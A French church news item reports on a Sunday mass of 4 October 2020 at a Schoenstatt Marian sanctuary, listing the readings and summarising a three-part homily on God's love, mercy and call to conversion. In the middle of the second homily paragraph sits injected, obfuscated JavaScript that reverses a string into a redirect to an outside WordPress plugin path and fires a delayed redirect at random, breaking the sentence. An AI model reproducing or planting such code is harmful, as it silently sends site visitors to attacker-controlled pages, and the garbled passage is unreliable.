La célébration eucharistique de neuf heures trente minutes de ce vingt-septième dimanche du Temps Ordinaire, le 04 octobre 2020, au Sanctuaire Marial de Schoenstatt a été présidée par le Père Marcien NDAYIZEYE et animée en chants religieux par la chorale saint Martin.

Les saintes Ecritures ont été tirées du livre du prophète Isaïe (Is 5, 1-7), de la lettre de saint Paul apôtre aux Philippiens (Ph 4, 6-9) et de l’Évangile selon saint Mathieu (Mt 21, 33-43).

Le père Marcien a subdivisé son homélie en 3 parties. Il a commencé par expliquer aux fidèles, de façon détaillée, l’amour que Dieu les aime parce qu’il nous a envoyé son Fils unique bien aimé pour nous sauver. Pour terminer, le célébrant nous a invité à suivre l’exemple de Jésus qui invite à nous aimer les uns les autres .

Le Père NDAYIZEYE a entamé la deuxième partie de son homélie en nous montrant combien le Seigneur est miséricordieux parce qu’il nous a envoyé les prophètes et son fils unique pour que nous puissions nous repentir. Ici, le Père a invité l’assemblée à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner un sens à leur vie en cessant de se venger.

Le dernier point développé est que le Seigneur ne cesse pas de nous appeler chacun en son nom pour que nous puissions revenir sur le bon chemin et bien terminé notre mission. Le prédicateur a appelé tout un chacun à faire examen à faire un examen de conscience en regardant si réellement il est dans le bon chemin, le chemin que Dieu nous a tracé. Le célébrant a conclu son homélie en émettant un souhait d’imiter Jésus pour que nous puissions avoir les fruits du Saint Esprit.

Grâce Divine